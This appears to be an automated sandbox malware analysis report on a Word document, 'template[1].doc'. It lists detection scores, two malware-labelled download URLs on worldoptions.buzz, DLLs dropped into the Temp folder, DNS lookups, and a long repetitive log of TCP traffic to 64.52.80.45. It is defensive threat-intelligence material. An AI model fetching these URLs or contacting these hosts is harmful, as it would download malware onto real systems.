Windows Analysis Report
template[1].doc

AV Detection

Source: template[1].doc

Virustotal: Detection: 12%

Perma Link

Source: http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4	Avira URL Cloud: Label: malware
Source: http://worldoptions.buzz/agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.png	Avira URL Cloud: Label: malware

Source: template[1].doc

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\wnitmpo.dll	Joe Sandbox ML: detected

Compliance

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.52.80.180:443 -> 192.168.2.22:49175 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: wnitmpo.dll.0.dr

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\wnitmpo.dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToCacheFileA

Jump to behavior

Source: global traffic	DNS query: name: worldoptions.buzz
Source: global traffic	DNS query: name: www.google.com
Source: global traffic	DNS query: name: com.lightbuzear.buzz

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 64.52.80.45:80
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 64.52.80.45:80 -> 192.168.2.22:49171
